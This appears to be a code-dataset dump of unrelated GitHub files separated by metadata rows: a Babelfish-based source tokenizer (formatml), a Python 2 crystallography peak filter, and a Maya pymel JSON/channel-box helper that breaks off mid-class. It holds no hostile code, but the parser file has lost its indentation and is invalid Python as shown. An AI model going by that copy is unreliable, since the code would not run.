def execute(self, something):
from pprint import pprint
pprint(something)
| [
"francesco.valente95@gmail.com"
] | francesco.valente95@gmail.com |
03a3e0ebe12bd7266956a59797984f584b2c24bb | deb6a9900bf5767ca9be40c658eab1fa7ae1ea40 | /formatml/parsing/parser.py | d2e19c5add03c5abd0577ce12cce4174cb4a6f30 | [
"Apache-2.0"
] | permissive | isabella232/formatml | fb73306f18614865401768be96d928cd8bc838f2 | f052313391a5a2ca47af7859520f968c423024f1 | refs/heads/master | 2022-02-22T17:27:52.829956 | 2019-09-10T16:22:44 | 2019-09-10T16:22:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,292 | py | from difflib import context_diff as unified_diff
from itertools import islice
from logging import getLogger
from os import environ
from pathlib import Path
from re import compile as re_compile, escape as re_escape
from typing import Any, Callable, Dict, List, NamedTuple, Optional, Set
from bblfsh import BblfshClient, Node as BblfshNode, role_name
from numpy import array, int32, uint32, unicode_
FORMATTING_INTERNAL_TYPE = "Formatting"
FORMATTING_ROLE = "FORMATTING"
class ParsingException(Exception):
"""Exception thrown in case of parsing failure."""
pass
class Node:
"""Replacement for bblfsh.Node to ease parent navigation."""
def __init__(
self,
*,
token: Optional[str],
internal_type: str,
roles: List[str],
parent: Optional["Node"],
start: Optional[int],
end: Optional[int],
):
"""
Construct a Node (bblfsh.Node wrapper).
:param token: Token that the Node represents.
:param internal_type: Native type of the node. Formatting for formatting nodes.
:param roles: List of Babelfish roles.
:param parent: Parent of the node.
:param start: Starting offset of the node in the parsed file.
:param end: Ending offset of the node in the parsed file.
"""
self.token = token
self.internal_type = internal_type
self.roles = roles
self.parent = parent
self.start = start
self.end = end
def __repr__(self) -> str:
return (
f"Node(token={self.token}, "
f"internal_type={self.internal_type}, "
f"roles={self.roles}, "
f"parent={id(self.parent)}, "
f"start={self.start}, "
f"end={self.end})"
)
class Nodes(NamedTuple):
"""Utilities for lists of nodes."""
nodes: List[Node]
node_index: Dict[int, int]
token_indexes: List[int]
formatting_indexes: List[int]
def to_tree(self, file_content: str) -> Dict[str, Any]:
"""
Convert a list of nodes into a tree serializable by asdf.
:param file_content: Content of the file from which the nodes were extracted.
:return: Dictionary serializable by asdf.
"""
roles_offset = 0
roles_offsets = []
for node in self.nodes:
roles_offsets.append(roles_offset)
roles_offset += len(node.roles)
for node in self.nodes:
if node.internal_type == "WhiteSpace":
assert node.token.isspace()
return dict(
file_content=array([file_content], dtype=unicode_),
internal_types=array(
[node.internal_type for node in self.nodes], dtype=unicode_
),
roles_list=array(
[role for node in self.nodes for role in node.roles], dtype=unicode_
),
roles_offsets=array(roles_offsets, dtype=uint32),
parents=array(
[self.node_index.get(id(node.parent), -1) for node in self.nodes],
dtype=int32,
),
starts=array([node.start for node in self.nodes], dtype=uint32),
ends=array([node.end for node in self.nodes], dtype=uint32),
token_indexes=array(self.token_indexes, dtype=uint32),
formatting_indexes=array(self.formatting_indexes, dtype=uint32),
)
@staticmethod
def from_token_nodes(token_nodes: List[Node]) -> "Nodes":
all_nodes = []
seen: Set[int] = set()
for node in token_nodes:
current = node
while current is not None:
if id(current) not in seen:
seen.add(id(current))
all_nodes.append(current)
current = current.parent
node_to_index = {id(node): i for i, node in enumerate(all_nodes)}
token_node_indexes = [
node_to_index[id(token_node)] for token_node in token_nodes
]
formatting_indexes = [
node_to_index[id(token_node)]
for token_node in token_nodes
if token_node.internal_type == FORMATTING_INTERNAL_TYPE
]
return Nodes(
nodes=all_nodes,
node_index=node_to_index,
token_indexes=token_node_indexes,
formatting_indexes=formatting_indexes,
)
@staticmethod
def from_tree(tree: Dict[str, Any]) -> "Nodes":
"""
Convert an asdf tree into a list of nodes.
:param tree: Tree to convert.
:return: Nodes corresponding to the tree and the indexes of formatting nodes.
"""
file_content = tree["file_content"][0]
roles = []
previous_roles_offset = 0
for roles_offset in tree["roles_offsets"][1:]:
roles.append(tree["roles_list"][previous_roles_offset:roles_offset])
previous_roles_offset = roles_offset
if tree["roles_offsets"].shape[0]:
roles.append(tree["roles_list"][previous_roles_offset:])
all_nodes = []
token_indexes_set = frozenset(tree["token_indexes"])
for i, (start, end, internal_type, roles) in enumerate(
zip(tree["starts"], tree["ends"], tree["internal_types"], roles)
):
all_nodes.append(
Node(
start=int(start),
end=int(end),
roles=roles,
parent=None,
internal_type=internal_type,
token=file_content[start:end] if i in token_indexes_set else "",
)
)
for node, parent_index in zip(all_nodes, map(int, tree["parents"])):
node.parent = all_nodes[parent_index] if parent_index >= 0 else None
for node in all_nodes:
if node.internal_type == "WhiteSpace":
assert node.token.isspace()
node_index = {id(node): i for i, node in enumerate(all_nodes)}
return Nodes(
all_nodes,
node_index,
token_indexes=[int(i) for i in tree["token_indexes"]],
formatting_indexes=[int(i) for i in tree["formatting_indexes"]],
)
class BblfshNodeConverter:
"""Convert `BblfshNode`-s to `Node`-s (and handle bytes-unicode conversion)."""
def __init__(self, file_content: str, convert_to_utf8: bool):
"""Contruct a converter."""
self.file_content = file_content
self.convert_to_utf8 = convert_to_utf8
self.binary_to_str: Dict[int, int] = {}
current_offset = 0
for i, char in enumerate(self.file_content):
self.binary_to_str[current_offset] = i
current_offset += len(char.encode("utf-8", errors="replace"))
self.binary_to_str[current_offset] = len(self.file_content)
def bblfsh_node_to_node(
self, bblfsh_node: BblfshNode, parent: Optional[Node]
) -> Node:
"""Create a `Node` given a `BblfshNode` and an optional parent."""
position = bool(
bblfsh_node.start_position.offset or bblfsh_node.end_position.offset
)
if position:
start = bblfsh_node.start_position.offset
end = bblfsh_node.end_position.offset
if self.convert_to_utf8:
start = self.binary_to_str[start]
end = self.binary_to_str[end]
token = self.file_content[start:end]
else:
start = None
end = None
token = bblfsh_node.token
# Workaround https://github.com/bblfsh/javascript-driver/issues/65
if not token and bblfsh_node.internal_type == "StringLiteralTypeAnnotation":
token = bblfsh_node.properties["value"]
return Node(
token=token,
internal_type=bblfsh_node.internal_type,
roles=[role_name(role_id) for role_id in bblfsh_node.roles],
parent=parent,
start=start,
end=end,
)
class Parser:
"""Parse files into list of nodes."""
def __init_subclass__(
cls,
bblfsh_language: str,
reserved: List[str],
uast_fixers: Optional[Dict[str, Callable[[BblfshNode], None]]] = None,
convert_to_utf8: bool = True,
) -> None:
cls._bblfsh_language = bblfsh_language
cls._parser_reserved = re_compile(
"|".join(re_escape(i) for i in sorted(reserved, reverse=True))
)
cls._parser_space = re_compile(r"\s+")
cls._uast_fixers = uast_fixers if uast_fixers else {}
cls._convert_to_utf8 = convert_to_utf8
cls._logger = getLogger(cls.__name__)
def __init__(
self,
bblfshd_endpoint: str = environ.get("BBLFSHD_ENDPOINT", "0.0.0.0:9432"),
split_formatting: bool = False,
) -> None:
"""Construct a parser."""
for attr in [
"_bblfsh_language",
"_parser_reserved",
"_parser_space",
"_uast_fixers",
]:
if not hasattr(self, attr):
raise NotImplementedError(
f"The {self.__class__.__name__} is a base class and should not be "
"used directly."
)
self._bblfsh_client = BblfshClient(bblfshd_endpoint)
self._split_formatting = split_formatting
@property
def split_formatting(self) -> bool:
return self._split_formatting
def parse(self, repository_path: Path, file_path: Path) -> Nodes:
"""
Parse a file into a list of `Node`s.
:param repository_path: Path of the folder that contains the file to parse.
:param file_path: Path of the file to parse.
:return: List of parsed `Node`s.
"""
response = self._bblfsh_client.parse(
str(repository_path / file_path), language=self._bblfsh_language
)
if response.status != 0:
self._logger.warn(
"Could not process file %s, errors: %s",
file_path,
"; ".join(response.errors),
)
raise ParsingException(
f"Could not process file {file_path}, "
f"errors: {'; '.join(response.errors)}"
)
file_content = (repository_path / file_path).read_text(
encoding="utf-8", errors="replace"
)
bblfsh_node_converter = BblfshNodeConverter(
file_content, convert_to_utf8=self._convert_to_utf8
)
root_node = bblfsh_node_converter.bblfsh_node_to_node(response.uast, None)
to_visit = [(response.uast, root_node)]
non_formatting_tokens = []
while to_visit:
current_bblfsh_node, current_node = to_visit.pop()
if current_bblfsh_node.internal_type in self._uast_fixers:
current_bblfsh_node = self._uast_fixers[
current_bblfsh_node.internal_type
](current_bblfsh_node)
if current_bblfsh_node is None:
continue
to_visit.extend(
(
bblfsh_child,
bblfsh_node_converter.bblfsh_node_to_node(
bblfsh_child, current_node
),
)
for bblfsh_child in current_bblfsh_node.children
)
if (
current_node.token
and not current_bblfsh_node.children
and (current_node.start is not None and current_node.end is not None)
):
non_formatting_tokens.append(current_node)
sentinel = Node(
token=None,
internal_type="Sentinel",
roles=[],
parent=None,
start=len(file_content),
end=len(file_content),
)
non_formatting_tokens.append(sentinel)
pos = 0
tokens = []
for node in sorted(non_formatting_tokens, key=lambda n: n.start):
if node.start < pos:
continue
if node.start > pos:
sumlen = 0
diff = file_content[pos : node.start]
additional_nodes = []
for match in self._parser_reserved.finditer(diff):
token = match.group()
additional_nodes.append(
Node(
start=match.start() + pos,
end=match.end() + pos,
token=token,
parent=None,
internal_type=token.title(),
roles=[match.group().upper()],
)
)
sumlen += len(token)
for match in self._parser_space.finditer(diff):
token = match.group()
assert token.isspace()
additional_nodes.append(
Node(
start=match.start() + pos,
end=match.end() + pos,
token=token,
parent=None,
internal_type=FORMATTING_INTERNAL_TYPE,
roles=[FORMATTING_ROLE],
)
)
sumlen += len(token)
if sumlen != node.start - pos:
self._logger.warn(f"missed some imaginary tokens: {diff}")
raise ParsingException(f"missed some imaginary tokens: {diff}")
tokens.extend(sorted(additional_nodes, key=lambda n: n.start))
if node is sentinel:
break
tokens.append(node)
pos = node.end
tokens = self._augment_tokens(tokens)
closest_left_node = None
for i, token_node in enumerate(tokens):
if token_node.parent is not None:
closest_left_node = token_node
else:
found_parent = self._find_parent(i, tokens, closest_left_node)
token_node.parent = (
found_parent if found_parent is not None else root_node
)
if self._split_formatting:
tokens = self._perform_split_formatting(tokens)
reconstructed_file_content = "".join(node.token for node in tokens)
if file_content != reconstructed_file_content:
diff = "".join(
unified_diff(
file_content.splitlines(keepends=True),
reconstructed_file_content.splitlines(keepends=True),
fromfile="original",
tofile="reconstructed",
)
)
self._logger.warn("reconstructed file is not equal to original:\n%s", diff)
return Nodes.from_token_nodes(tokens)
def _augment_tokens(self, tokens: List[Node]) -> List[Node]:
augmented_tokens = []
if not tokens or tokens[0].internal_type != FORMATTING_INTERNAL_TYPE:
augmented_tokens.append(
Node(
start=0,
end=0,
token="",
parent=None,
internal_type=FORMATTING_INTERNAL_TYPE,
roles=[FORMATTING_ROLE],
)
)
if tokens:
augmented_tokens.append(tokens[0])
for previous_token, next_token in zip(
islice(tokens, 0, None), islice(tokens, 1, None)
):
assert previous_token.end == next_token.start
if (
previous_token.internal_type != FORMATTING_INTERNAL_TYPE
and next_token.internal_type != FORMATTING_INTERNAL_TYPE
):
augmented_tokens.append(
Node(
start=previous_token.end,
end=previous_token.end,
token="",
parent=None,
internal_type=FORMATTING_INTERNAL_TYPE,
roles=[FORMATTING_ROLE],
)
)
augmented_tokens.append(next_token)
if tokens and tokens[-1].internal_type != FORMATTING_INTERNAL_TYPE:
augmented_tokens.append(
Node(
start=tokens[-1].end,
end=tokens[-1].end,
token="",
parent=None,
internal_type=FORMATTING_INTERNAL_TYPE,
roles=[FORMATTING_ROLE],
)
)
return augmented_tokens
@staticmethod
def _find_parent(
node_index: int, nodes: List[Node], closest_left_node: Optional[Node]
) -> Optional[Node]:
"""
Compute a node's parent as the LCA of the closest left and right nodes.
:param node_index: Index of the node for which to find a parent.
:param nodes: Sequence of token `Node`-s.
:param closest_left_node: Closest node on the left with a true parent.
:return: The Node of the found parent or None if no parent was found.
"""
if closest_left_node is None:
return None
left_ancestor_ids = set()
current_left_ancestor = closest_left_node.parent
while current_left_ancestor is not None:
left_ancestor_ids.add(id(current_left_ancestor))
current_left_ancestor = current_left_ancestor.parent
for future_node in nodes[node_index + 1 :]:
if future_node.parent is not None:
break
else:
return None
current_right_ancestor = future_node.parent
while current_right_ancestor is not None:
if id(current_right_ancestor) in left_ancestor_ids:
return current_right_ancestor
current_right_ancestor = current_right_ancestor.parent
return None
def _perform_split_formatting(self, nodes: List[Node]) -> List[Node]:
"""
Split each formatting node into a list of one node per character.
:param nodes: Sequence of token `Node`-s.
:return: The new sequence, with split formatting nodes.
"""
new_nodes = []
for node in nodes:
if node.internal_type == FORMATTING_INTERNAL_TYPE and node.token:
for i, char in enumerate(node.token):
new_nodes.append(
Node(
token=char,
internal_type=node.internal_type,
roles=node.roles,
parent=node.parent,
start=node.start + i,
end=node.start + i + 1,
)
)
else:
new_nodes.append(node)
return new_nodes
def __del__(self) -> None:
if self._bblfsh_client:
self._bblfsh_client._channel.close()
self._bblfsh_client._channel = self._bblfsh_client._stub = None
| [
"142691+m09@users.noreply.github.com"
] | 142691+m09@users.noreply.github.com |
69484baf224d613ae89357045b4d223942efb5f2 | 06e8f017c2a20a1b816997f095ce81c9e123465c | /peak_searching/lib/positive_diff_peak_remover.py | fff93b767810850948c9659f74d54cfdae5590ec | [] | no_license | charliebury/garmanwork | 14a9357d9f7f81373423811be714b39ec1f51fa3 | df665c5b6f3445653aa0cd11c610561175fda48f | refs/heads/master | 2020-04-16T02:01:06.639127 | 2015-03-01T19:42:18 | 2015-03-01T19:42:18 | 28,575,918 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,331 | py | # -*- coding: utf-8 -*-
"""
Created on Sun Nov 23 23:35:57 2014
@author: charlie
"""
from termcolor import colored
import sys
######################################################################################################################################################
######################################################################################################################################################
#SECTION: REMOVE POSITIVE DIFFERENCE MAP PEAKS
######################################################################################################################################################
######################################################################################################################################################
def positive_diff_peak_remover(filelist,datedir):
    """
    Filter positive difference-map peaks out of a .pdb/.ha file pair.

    Reads the FFT-produced .pdb and .ha peak files named in `filelist`
    (indices 1 and 2), writes new "negpeaksonly" .pdb/.ha files into
    `datedir.path` containing only the negative peaks (non-ATOM preamble
    lines are copied through unchanged), prints a colored kept/removed
    report per .ha peak, and aborts the script if the two files disagree
    on the number of negative peaks.

    :param filelist: Sequence whose [1] is the .pdb path and [2] the .ha path.
    :param datedir: Object with `path` and `date` attributes used to name
                    the output files.
    :return: Number of negative peaks kept.
    """
    pdbfilename = filelist[1]
    hafilename = filelist[2]
    ################################################################################
    #input file names for .pdb and .ha files (outputted by FFT) from which the
    #positive peaks should be removed automatically
    pdbin = open(str(pdbfilename), "r" )
    hain = open(str(hafilename), "r" )
    pdblines = pdbin.readlines()
    halines = hain.readlines()
    #writes a new .pdb and .ha file containing ONLY negative difference map peaks
    #and places it in the directory created above
    newfilepdb = open(datedir.path +'/'+"negpeaksonly"+datedir.date+".pdb", "w")
    newfileha = open(datedir.path +'/'+"negpeaksonly"+datedir.date+".ha", "w")
    #reads through the .pdb and .ha files and removes positive peaks, whilst
    #keeping the necessary preamble at the top of each file type to allow them to
    #be read
    counter_pdb = 0
    for line in pdblines:
        if 'ATOM' not in line[0:5]:
            newfilepdb.write(line)
        elif 'ATOM' in line[0:5]:
            # PDB fixed-column format: occupancy field (cols 55-60) holds
            # the peak height here; keep only non-positive peaks.
            if float(line[54:60]) <= 0:
                newfilepdb.write(line)
                counter_pdb += 1
            else:
                pass
    print '#'+ ' '*5 + 'Type' + ' '*10 + 'Sigma' + ' '*11 + 'Status'
    counter = 0
    line_counter = 0
    for line in halines:
        if 'ATOM' not in line[0:4]:
            newfileha.write(line)
        elif 'ATOM' in line[0:4]:
            line_counter += 1
            # .ha files are whitespace-delimited; field 6 is the peak sigma.
            if float(line.split()[5]) <= 0:
                counter+=1
                print str(line_counter) + ': ' + colored('Negative','red') + ' @ ' + colored(str(float(line.split()[5])),'blue') + ' ----> ' + 'kept'
                newfileha.write(line)
            else:
                print str(line_counter) + ': ' + colored('Positive','green') + ' @ ' + colored(str(float(line.split()[5])),'blue') + ' ----> ' + 'removed'
    # as a check, determine whether diff peak pdb and ha files contain same number of neg peaks
    if counter != counter_pdb:
        print 'Incompatible .pdb and .ha files.. different numbers of negative peaks detected'
        print '---> Terminating script...'
        sys.exit()
    print 'Breakdown summary: ' + str(counter) + ' negative peaks found in current file.'
    pdbin.close()
    hain.close()
    newfilepdb.close()
    newfileha.close()
    return counter
"csbury@me.com"
] | csbury@me.com |
8e8638190f9f4e57c66537cf4152141a91fe3c67 | 8a045d3c5437fbb7138a028745464149d6b8c217 | /animation/helper.py | cb12b878dd659bd2f1ff7659e3914c9b521e3b2b | [
"MIT"
] | permissive | jzboylxj/XDLibs | 14b10329683517762dc75a72694a16c856b1b88f | 76ab640502d7e254bc98930d6ebb9e870476ed9a | refs/heads/master | 2023-03-24T02:09:32.575609 | 2021-03-11T02:14:50 | 2021-03-11T02:14:50 | 279,275,167 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 105,941 | py | # coding=utf-8
"""
JSON数据管理工具
"""
import json
import os
from imp import reload
from animation import common
from animation import test_node
from pymel import core as pm
reload(common)
reload(test_node)
version = 0.2
def str_to_list(value):
    """
    Split a ``;``-separated string into a list of trimmed, non-empty items.

    :param value: The string to parse, e.g. ``"a; b;;c"``.
    :return: List of stripped substrings, e.g. ``["a", "b", "c"]``.
    """
    # NOTE(review): parameter renamed from ``str`` — it shadowed the builtin.
    # Every in-repo caller passes the argument positionally.
    return [item.strip() for item in value.split(";") if item.strip()]
def list_to_str(data=None):
    """
    Join list items into a single space-separated string.

    :param data: List of strings to join; ``None`` is treated as empty.
    :return: The joined string with outer whitespace stripped,
             e.g. ``["a", "b"]`` -> ``"a b"``.
    """
    if data is None:
        data = []
    # str.join is linear, unlike repeated concatenation; the trailing
    # strip() preserves the original behavior when items are empty strings.
    return " ".join(data).strip()
def zero_locator(name):
    """
    Create a locator whose channel-box attributes are all locked and hidden.

    :param name: Name to give the new locator.
    :return: The created locator.
    """
    locator = pm.spaceLocator(name=name, p=[0, 0, 0])
    # Lock/hide translate, rotate, scale (X/Y/Z each) and visibility.
    locked = ["%s%s" % (channel, axis)
              for channel in ("t", "r", "s")
              for axis in ("x", "y", "z")] + ["v"]
    for attr_name in locked:
        pm.setAttr("%s.%s" % (name, attr_name), lock=True, k=False, cb=False)
    return locator
def position_joint(jnt_name, value=None):
    """
    Move the given joint to the transform described by ``value``.

    :param jnt_name: Name of the joint to position.
    :param value: Nine floats — translate XYZ, rotate XYZ, scale XYZ
                  (defaults to the identity transform).
    :return: None
    """
    if value is None:
        value = [0, 0, 0, 0, 0, 0, 1, 1, 1]
    node = pm.PyNode(jnt_name)
    attr_names = ("translateX", "translateY", "translateZ",
                  "rotateX", "rotateY", "rotateZ",
                  "scaleX", "scaleY", "scaleZ")
    for attr_name, attr_value in zip(attr_names, value):
        node.attr(attr_name).set(attr_value)
    return
class ChannelBoxSaver(common.Singleton):
    """
    Channel-box attribute saving tool.

    Reads the channel-box attribute values of the selected objects,
    converts them into a dict and writes that dict to a JSON file
    (one file per controller).
    """
    def __init__(self):
        super(ChannelBoxSaver, self).__init__()
        # slider_mode: 1 = slider (multi, samples max and min), 2 = single.
        self.slider_mode = 1
        # Directory the per-controller JSON files are written to.
        self.output_path = ''
        # Working dict rebuilt per controller in map_channel_box().
        self.dict_data = {}
        self.initialize()
    def initialize(self):
        """Restore output path and slider mode from Maya option variables."""
        if pm.optionVar(q='doChannelBoxSavePath'):
            self.output_path = pm.optionVar(
                q='doChannelBoxSavePath')
        if pm.optionVar(q='sliderWokeMode'):
            self.slider_mode = int(pm.optionVar(
                q='sliderWokeMode'))
    def show(self):
        """Build (or rebuild) the main window and show it."""
        if pm.window("channelBoxSaver", ex=True):
            pm.deleteUI("channelBoxSaver")
        pm.window(
            "channelBoxSaver",
            title=u"Json数据备份工具 Ver %s" % version,
            closeCommand=lambda *args: self._closed_window_cmd())
        form_layout = pm.formLayout()
        dict_layout = pm.frameLayout(mh=5, mw=10, label=u"定义数据", bgs=True)
        pm.radioButtonGrp(
            "sliderWokeMode",
            label=u'工作模式:',
            labelArray2=[u'滑竿(多项)', u'单项'],
            cw3=[60, 100, 100],
            sl=self.slider_mode,
            cc=lambda *args: self.change_slider(),
            numberOfRadioButtons=2)
        pm.textScrollList("dataExportList", ams=True)
        # Right-click menu for managing the export list.
        pm.popupMenu()
        pm.menuItem(
            label=u"添加场景中的选择对象",
            c=lambda *args: self.add_slider())
        pm.menuItem(
            label=u"从列表中移除选择对象",
            # c=lambda *args: self.add_slider_key("sliderY", "sliderKeyList")
            )
        pm.menuItem(
            label=u"从列表中移除所有对象",
            c=lambda *args: self.clean_list()
            )
        pm.setParent("..")
        file_layout = pm.frameLayout(mh=5, mw=10, label=u"定义输出", bgs=True)
        pm.columnLayout(adj=1, rs=10)
        pm.textFieldButtonGrp(
            "channelBoxSavePathInput",
            label=u"保存路径",
            bl=u"选择地址",
            adj=2,
            cw3=[55, 100, 60],
            text=self.output_path,
            bc=lambda *args: self._set_output_path())
        pm.setParent("..")
        pm.button(label=u"保存", c=lambda *args: self.map_channel_box())
        pm.setParent("..")
        pm.formLayout(
            form_layout, edit=True,
            attachForm=[
                (dict_layout, 'top', 10),
                (dict_layout, 'left', 10),
                (dict_layout, 'right', 10),
                (file_layout, 'left', 10),
                (file_layout, 'right', 10),
                (file_layout, 'bottom', 10),
            ],
            attachControl=[
                (dict_layout, 'bottom', 5, file_layout),
            ],
        )
        pm.showWindow("channelBoxSaver")
    def change_slider(self):
        """Sync slider_mode with the radio-button selection."""
        self.slider_mode = pm.radioButtonGrp("sliderWokeMode", q=True, sl=True)
        return
    def add_slider(self):
        """Add the current scene selection to the export list (deduplicated)."""
        for item in pm.ls(sl=True):
            if (item not in pm.textScrollList(
                    "dataExportList", q=True, ai=True)):
                pm.textScrollList("dataExportList", e=True, a=item)
        # print pm.textScrollList("dataExportList", q=True, ai=True)
    def clean_list(self):
        """Remove every entry from the export list."""
        pm.textScrollList("dataExportList", e=True, ra=True)
    def _get_slider(self):
        """Load the first selected node's keyable attrs into the slider list."""
        select_slider = pm.ls(sl=True)[0]
        pm.textFieldButtonGrp("sliderGetBtn", e=True, text=select_slider)
        current_sliders = pm.textScrollList("sliderKeyList", q=True, ai=True)
        slider_attrs = pm.listAttr(select_slider, k=True)
        for slider_attr in slider_attrs:
            if select_slider not in current_sliders:
                pm.textScrollList("sliderKeyList", e=True, a=slider_attr)
        for item in pm.textScrollList("sliderKeyList", q=True, ai=True):
            self.dict_data[item] = dict()
        return
    def _select_slider(self):
        """Refresh the range list for the selected slider; clear the joint list."""
        current_select = pm.textScrollList("sliderKeyList", q=True, si=True)[0]
        # print(current_select)
        pm.textScrollList("rangeKeyList", e=True, ra=True)
        pm.textScrollList(
            "rangeKeyList", e=True, a=self.dict_data[current_select].keys())
        pm.textScrollList("jointKeyList", e=True, ra=True)
        return
    def _select_range(self):
        """Refresh the joint list for the selected slider/range pair."""
        current_slider = pm.textScrollList("sliderKeyList", q=True, si=True)[0]
        current_range = pm.textScrollList("rangeKeyList", q=True, si=True)[0]
        # print("%s.%s" % (current_slider, current_range))
        pm.textScrollList("jointKeyList", e=True, ra=True)
        pm.textScrollList(
            "jointKeyList",
            e=True,
            a=self.dict_data[current_slider][current_range].keys())
        return
    def _select_joints(self):
        """Select in the scene the joints highlighted in the joint list."""
        pm.select(pm.textScrollList("jointKeyList", q=True, si=True))
    def add_range_field(self, field, scroll_list):
        """Add a new range key under the currently selected slider."""
        current_slider = pm.textScrollList("sliderKeyList", q=True, si=True)[0]
        if not self._check_field_exists(field, scroll_list):
            pm.textScrollList(scroll_list, e=True, a=[field])
            self.dict_data[current_slider][field] = dict()
    def _append_joints(self):
        """Record the selected joints' channel values under slider/range.

        Translate values are scaled by 0.01 — presumably to bridge the
        cm-vs-m unit difference when the data is consumed outside Maya.
        """
        current_slider = pm.textScrollList("sliderKeyList", q=True, si=True)[0]
        current_range = pm.textScrollList("rangeKeyList", q=True, si=True)[0]
        current_joints = pm.textScrollList("jointKeyList", q=True, ai=True)
        for jnt in pm.ls(sl=True):
            if jnt not in current_joints:
                pm.textScrollList("jointKeyList", e=True, a=jnt)
                jnt_value = [
                    round(jnt.translateX.get() * 0.01, 5),
                    round(jnt.translateY.get() * 0.01, 5),
                    round(jnt.translateZ.get() * 0.01, 5),
                    round(jnt.rotateX.get(), 5),
                    round(jnt.rotateY.get(), 5),
                    round(jnt.rotateZ.get(), 5),
                    round(jnt.scaleX.get(), 5),
                    round(jnt.scaleY.get(), 5),
                    round(jnt.scaleZ.get(), 5),
                ]
                self.dict_data[
                    current_slider][current_range][jnt.controller_name()] = jnt_value
        return
    def _check_field_exists(self, field, scroll_list):
        """Return True if `field` is already an item of `scroll_list`."""
        scroll_list = pm.textScrollList(scroll_list, q=True, ai=True)
        if field in scroll_list:
            return True
        else:
            return False
    def add_slider_key(self, slider, scroll_list):
        """Add `slider` to the list and (re)initialize dict_data entries."""
        if not self._check_field_exists(slider, scroll_list):
            pm.textScrollList(scroll_list, e=True, a=slider)
        for item in pm.textScrollList(scroll_list, q=True, ai=True):
            self.dict_data[item] = dict()
        return
    def _set_output_path(self):
        """Let the user pick the output directory via a file dialog."""
        output_path = pm.fileDialog2(
            dialogStyle=2,
            fileFilter="JSON File (*.json);;",
            fileMode=3, okc=u"选择文件夹")
        if output_path:
            pm.textFieldButtonGrp(
                "channelBoxSavePathInput", e=True,
                text=output_path[0])
            self.output_path = output_path[0]
        return
    def parse_str(self, str_data):
        """Split a ``;``-separated string into trimmed, non-empty items."""
        str_list = str_data.split(";")
        str_list = [x.strip() for x in str_list if x.strip() != '']
        return str_list
    def joint_cb_list(self, item):
        """Return [tx*0.01, ty*0.01, tz*0.01, rx, ry, rz, sx, sy, sz] of `item`."""
        jnt_value = [
            round(pm.PyNode(item).translateX.get() * 0.01, 5),
            round(pm.PyNode(item).translateY.get() * 0.01, 5),
            round(pm.PyNode(item).translateZ.get() * 0.01, 5),
            round(pm.PyNode(item).rotateX.get(), 5),
            round(pm.PyNode(item).rotateY.get(), 5),
            round(pm.PyNode(item).rotateZ.get(), 5),
            round(pm.PyNode(item).scaleX.get(), 5),
            round(pm.PyNode(item).scaleY.get(), 5),
            round(pm.PyNode(item).scaleZ.get(), 5),
        ]
        return jnt_value
    def get_joint_data(self, controller, slider):
        """Sample joints driven by `slider` at its extreme values.

        Drives the controller's slider attribute to 1 (max) and — in
        slider mode — to -1 (min), recording each driven joint's channel
        values into dict_data, then resets the slider to 0.
        """
        jnt_str = ""
        if slider == "sliderX":
            jnt_str = "jointsX"
        if slider == "sliderY":
            jnt_str = "jointsY"
        if slider == "sliderZ":
            jnt_str = "jointsZ"
        for item in self.parse_str(
                pm.getAttr("%s.%s" % (controller, jnt_str))):
            # print item
            self.dict_data[slider][item] = dict()
            pm.setAttr("%s.%s" % (controller, slider), 1)
            self.dict_data[slider][item]["max"] = self.joint_cb_list(item)
            if pm.radioButtonGrp("sliderWokeMode", q=True, sl=True) == 1:
                pm.setAttr("%s.%s" % (controller, slider), -1)
                self.dict_data[slider][item]["min"] = self.joint_cb_list(item)
            pm.setAttr("%s.%s" % (controller, slider), 0)
    def map_channel_box(self):
        """
        Read the channel-box attribute values of every listed controller,
        convert them into a dict and write one JSON file per controller.
        :return:
        """
        controller_list = pm.textScrollList("dataExportList", q=True, ai=True)
        for controller in controller_list:
            self.dict_data = {}
            if pm.attributeQuery('sliderX', node=controller, ex=True):
                self.dict_data['sliderX'] = dict()
                # Drive the attribute to 1 — that is the "max" state.
                self.get_joint_data(controller, 'sliderX')
            if pm.attributeQuery('sliderY', node=controller, ex=True):
                self.dict_data["sliderY"] = dict()
                self.get_joint_data(controller, 'sliderY')
            if pm.attributeQuery('sliderZ', node=controller, ex=True):
                self.dict_data["sliderZ"] = dict()
                self.get_joint_data(controller, 'sliderZ')
            folder = pm.textFieldButtonGrp(
                "channelBoxSavePathInput", q=True, text=True)
            json_name = ("%s/%s.json" % (folder, controller))
            common.write_json(dict_data=self.dict_data, file_path=json_name)
            print(u"%s 转化完毕" % controller)
        return
    def _closed_window_cmd(self):
        """Persist the output path and slider mode as Maya option variables."""
        pm.optionVar(sv=('doChannelBoxSavePath', self.output_path))
        pm.optionVar(sv=('sliderWokeMode', self.slider_mode))
class CustomAttrHelper(common.Singleton):
    """
    Window tool for managing the custom attributes (jointsX/Y/Z) of a
    custom controller.
    """
    def __init__(self):
        super(CustomAttrHelper, self).__init__()
        self.initialize()
        self.show()
    def initialize(self):
        # No state to restore for this tool.
        pass
    def show(self):
        """Build (or rebuild) the helper window and show it."""
        if pm.window("customAttrHelper", q=True, ex=True):
            pm.deleteUI("customAttrHelper")
        pm.window("customAttrHelper", title="Custom Attr Helper")
        self.main_form = pm.formLayout()
        self.frame_layout = pm.frameLayout(
            label="Custom Attr Helper", bgs=True)
        self.form_layout = pm.formLayout()
        self.controller_field = pm.textFieldButtonGrp(
            "customControllerGetter",
            label=u"控制器名称:",
            bl=u" Get ",
            cw3=[75, 70, 70],
            adj=2,
            bc=lambda *args: self.get_custom_controller())
        self.select_controller_btn = pm.button(
            label=u"选择控制器",
            c=lambda *args: self.select_controller())
        self.controller_attr_options = pm.radioButtonGrp(
            "customControllerAttrOptions",
            label=u'控制器属性:',
            labelArray3=['jointsX', 'jointsY', 'jointsZ'],
            cw4=[75, 70, 70, 70],
            sl=1,
            numberOfRadioButtons=3,
            cc=lambda *args: self.select_radio_item())
        self.add_joint_btn = pm.button(
            label=u"添加影响骨骼",
            c=lambda *args: self.joint_string_value())
        self.text_scroll = pm.textScrollList(ams=True)
        pm.popupMenu()
        pm.menuItem(label=u"选择所选",
                    c=lambda *args: self.select_item())
        pm.formLayout(
            self.form_layout,
            edit=True,
            attachForm=[
                (self.controller_field, 'top', 10),
                (self.controller_field, 'left', 10),
                (self.select_controller_btn, 'top', 10),
                (self.select_controller_btn, 'right', 10),
                (self.controller_attr_options, 'left', 10),
                (self.controller_attr_options, 'right', 10),
